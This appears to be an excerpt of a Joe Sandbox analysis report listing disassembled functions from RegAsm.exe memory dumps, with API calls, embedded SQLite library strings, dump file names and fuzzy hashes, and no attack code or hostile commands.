Uniqueness Score: -1.00%

Function 19CBCFE0 Relevance: 6.1, APIs: 4, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67f155ee4936aae19aec06cb809ffc92085dd37a0bce870209c165f40ac7d322
Instruction ID: 0089b8469f5725e4252413eb69280357462e64fccdb4c8ae700d22fe335d2d8b
Opcode Fuzzy Hash: 67f155ee4936aae19aec06cb809ffc92085dd37a0bce870209c165f40ac7d322
Instruction Fuzzy Hash: E321D0755007069FD750EF68E880A5ABBF0EF98340F94482DF5C6C7221E731E658CB92

Uniqueness

Uniqueness Score: -1.00%

Function 19E1F4CA Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,00000000,?,?,00000000), ref: 19E1F4E0
GetLastError.KERNEL32(?,?,?,?), ref: 19E1F4ED
SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 19E1F513
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 19E1F539

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID: FilePointer$ErrorLast
String ID:
API String ID: 142388799-0
Opcode ID: c3c47990b2f302fe0c66bb44f4634820d9a0aa32aa2901eae36b8c9458398b63
Instruction ID: 9b6ed60037b8eefb440053f8ffe5bd1f0cfd7dca40a2c46aecfc546368c73a58
Opcode Fuzzy Hash: c3c47990b2f302fe0c66bb44f4634820d9a0aa32aa2901eae36b8c9458398b63
Instruction Fuzzy Hash: D4111271900269ABDF119FA6CC489DF3F79EB04764F148554F828AA1A0D731DA90DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 19C22ABD Relevance: 6.0, APIs: 4, Instructions: 30COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 19E21382
GetLastError.KERNEL32 ref: 19E2138E
___initconout.LIBCMT ref: 19E2139E

Part of subcall function 19E21303: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,19E213A3), ref: 19E21316

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 19E213B3

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID: ConsoleWrite$CreateErrorFileLast___initconout
String ID:
API String ID: 3431868840-0
Opcode ID: d04a68d59e690c1534eade95321d89ac895420051f47045088b0e9f631dcbbd2
Instruction ID: 95e22f4d81c8a98f11595a5bba2b6b077f43588459bfbc80e42a91bfad3eed63
Opcode Fuzzy Hash: d04a68d59e690c1534eade95321d89ac895420051f47045088b0e9f631dcbbd2
Instruction Fuzzy Hash: DDF0123A9441A5BBCF232FA5CC4998B3F7AFB486A1F554010F91D95511DA32CA60DB90

Uniqueness

Uniqueness Score: -1.00%

Function 19C3BE80 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 314COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 19C3C1B5

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: 552194c84524f3bf8481957aa2f96c5f4bbbb25de170e20530f1a0259fc6d4b8
Instruction ID: f3ea4812a83810dfe9f7b28c323cd8bee9a9befc3cd06b27004f5956ede3c540
Opcode Fuzzy Hash: 552194c84524f3bf8481957aa2f96c5f4bbbb25de170e20530f1a0259fc6d4b8
Instruction Fuzzy Hash: 5DA13676D487825FD7048E29EC4136AB7D1AF89222FDC5B2DECE1472D1E720D6858A81

Uniqueness

Uniqueness Score: -1.00%

Function 19DA7300 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

-, xrefs: 19DA7538
%!.15g, xrefs: 19DA75C3

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %!.15g$-
API String ID: 0-583212262
Opcode ID: 44df7578df35874e74d8c199278634f51dfc336e28de308c6a73b924212666ee
Instruction ID: f1c0f8f0017cf1b0ff9b09f401a5a8458a8da02079dd849581de1619d759e7d6
Opcode Fuzzy Hash: 44df7578df35874e74d8c199278634f51dfc336e28de308c6a73b924212666ee
Instruction Fuzzy Hash: D5917871A083468FD304DF6DD89175AFBE0EBC8344F48492DE899CB351E7B9D9098B92

Uniqueness

Uniqueness Score: -1.00%

Function 19C6CBF0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 19C6CE39

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: 089babd60e24f957d499a8cfbf19277665b9e48983c79e9b3067da30df6178fd
Instruction ID: a1020825ef6e0c264f76c967455a9a1ee3099861ca54f3429eb5240d9c0ad003
Opcode Fuzzy Hash: 089babd60e24f957d499a8cfbf19277665b9e48983c79e9b3067da30df6178fd
Instruction Fuzzy Hash: A5810E76E843019BE304CF18E8C1B5ABBF5AF84310F4C4928EAC5973A2E775E955C792

Uniqueness

Uniqueness Score: -1.00%

Function 19D478F0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 214COMMON

Download Yara Rule

Strings

*, xrefs: 19D47982
?, xrefs: 19D4794A

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: *$?
API String ID: 0-2367018687
Opcode ID: 63f0012c85d487385c0ab978f170766a727a5751edcd3660f3e5831b743d8279
Instruction ID: b307124049b9aca063ba5acfb3b742e2b8fefb18fbc9168a074ff80fe1a66f08
Opcode Fuzzy Hash: 63f0012c85d487385c0ab978f170766a727a5751edcd3660f3e5831b743d8279
Instruction Fuzzy Hash: 0F7149B0A083918FD7118F28C88571BBBE6FF85200F2E496DE8CD97B41D775DA4587A2

Uniqueness

Uniqueness Score: -1.00%

Function 19C3C8E0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 206COMMON

Download Yara Rule

Strings

ESCAPE expression must be a single character, xrefs: 19C3CA43
LIKE or GLOB pattern too complex, xrefs: 19C3C94F

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
API String ID: 0-264706735
Opcode ID: ecf4f880bedc32a6e603ea8c66b2e1c0f185ffaef39f51fd14a01f85d4d093a8
Instruction ID: 9126f60a2d22765a8bbcc73fd8667763f6f265c98ab4aead3bfd76cd471ff914
Opcode Fuzzy Hash: ecf4f880bedc32a6e603ea8c66b2e1c0f185ffaef39f51fd14a01f85d4d093a8
Instruction Fuzzy Hash: 0D619B36D943914FD704CA22EC82B6D7791AB42326F9D415DECE25B2C2D736C781C361

Uniqueness

Uniqueness Score: -1.00%

Function 19C3D0F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 19C3D213

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: ca05c710240ef9925998b63374b3e92edd20d521160c716aaa6acd6344145c5f
Instruction ID: b97323220f1da2a3314a1a84d3bebe9af7465835bad95f83988083a979aba445
Opcode Fuzzy Hash: ca05c710240ef9925998b63374b3e92edd20d521160c716aaa6acd6344145c5f
Instruction Fuzzy Hash: FE4139778042414FE7108A28FC4179A7B969F51371F8C4A39ECE9537D3E666E748C392

Uniqueness

Uniqueness Score: -1.00%

Function 19C355D0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

winDelete, xrefs: 19C3569C
delayed %dms for lock/sharing conflict at line %d, xrefs: 19C356D1

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
API String ID: 0-1405699761
Opcode ID: 4d71ed5348140f0ecd72eaed6d85b9caf0c885f56ee57fe6d0d56398b02c2e37
Instruction ID: 95e4210b31f7ed0270d429e7f197e501020e7b22b896cf5c672d4b918ecd1cd7
Opcode Fuzzy Hash: 4d71ed5348140f0ecd72eaed6d85b9caf0c885f56ee57fe6d0d56398b02c2e37
Instruction Fuzzy Hash: 5F3139B3E002E19BD7113A38EDCD95B773CA761263F898532E99FC63C1D621C644C692

Uniqueness

Uniqueness Score: -1.00%

Function 19C3D300 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 19C3D3D5

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: 484f1b360ee52976c6f37fa94cfc967f7e9f573ddbb084a995a2902f7d583f7e
Instruction ID: eac8573fbaec6a6ac8601c2694f9096a0ab984cd942a4eefdc5e6788545e940c
Opcode Fuzzy Hash: 484f1b360ee52976c6f37fa94cfc967f7e9f573ddbb084a995a2902f7d583f7e
Instruction Fuzzy Hash: 3431A9B79042205BD7004A24FC00B66372A9B86326F9C42A8F8D16B3C2D267EE16C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 19DB7E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

OsError 0x%lx (%lu), xrefs: 19DB7ED9

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: OsError 0x%lx (%lu)
API String ID: 0-3720535092
Opcode ID: 227bb654c05d5c0331670eb3e825ff4eda5c63a9d195c706d6cc99f8f2f0fac3
Instruction ID: 8004294b7e260a4a06cba3fa5a907f41e43b0eabaf2012347a2f657f22249c19
Opcode Fuzzy Hash: 227bb654c05d5c0331670eb3e825ff4eda5c63a9d195c706d6cc99f8f2f0fac3
Instruction Fuzzy Hash: 3521B071A00261ABE702AB74DC8CF5B37ACEF45256F094424F94AD5690DB31D910D7A3

Uniqueness

Uniqueness Score: -1.00%

Function 19C2141F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

GetXStateFeaturesMask, xrefs: 19E00E34
InitializeCriticalSectionEx, xrefs: 19E00E84

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: GetXStateFeaturesMask$InitializeCriticalSectionEx
API String ID: 0-4196971266
Opcode ID: 9f5287941d9300bd3b1201708ba690b47d0aa159277e780eac269fadce8954da
Instruction ID: 2efad176c6b2e3640c365d42637b61e0fc8bfc5ccc8a7caa36a952a649ce588a
Opcode Fuzzy Hash: 9f5287941d9300bd3b1201708ba690b47d0aa159277e780eac269fadce8954da
Instruction Fuzzy Hash: A601F735A40168B7CF116EA1EC19DCF3F06DB40BA2F4D8021FE0C76250DA729C61D6C0

Uniqueness

Uniqueness Score: -1.00%

Function 19C4F740 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';, xrefs: 19C4F752

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';
API String ID: 0-2071071404
Opcode ID: 0f34df791f308c5ab032e6b53cd3af4b0fb7cdb09f579ac3df0bb732cde4cbd0
Instruction ID: 20364cd79bc716f18e47b4821326e8bea45af662096b9ccf77261083ba86aa8e
Opcode Fuzzy Hash: 0f34df791f308c5ab032e6b53cd3af4b0fb7cdb09f579ac3df0bb732cde4cbd0
Instruction Fuzzy Hash: 8E11E3B5E00161AFE201AB38ECDDF6B33ACEB54245F584129F949C3280EB64B814C6B2

Uniqueness

Uniqueness Score: -1.00%

Function 19C55350 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

F, xrefs: 19C5539B

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
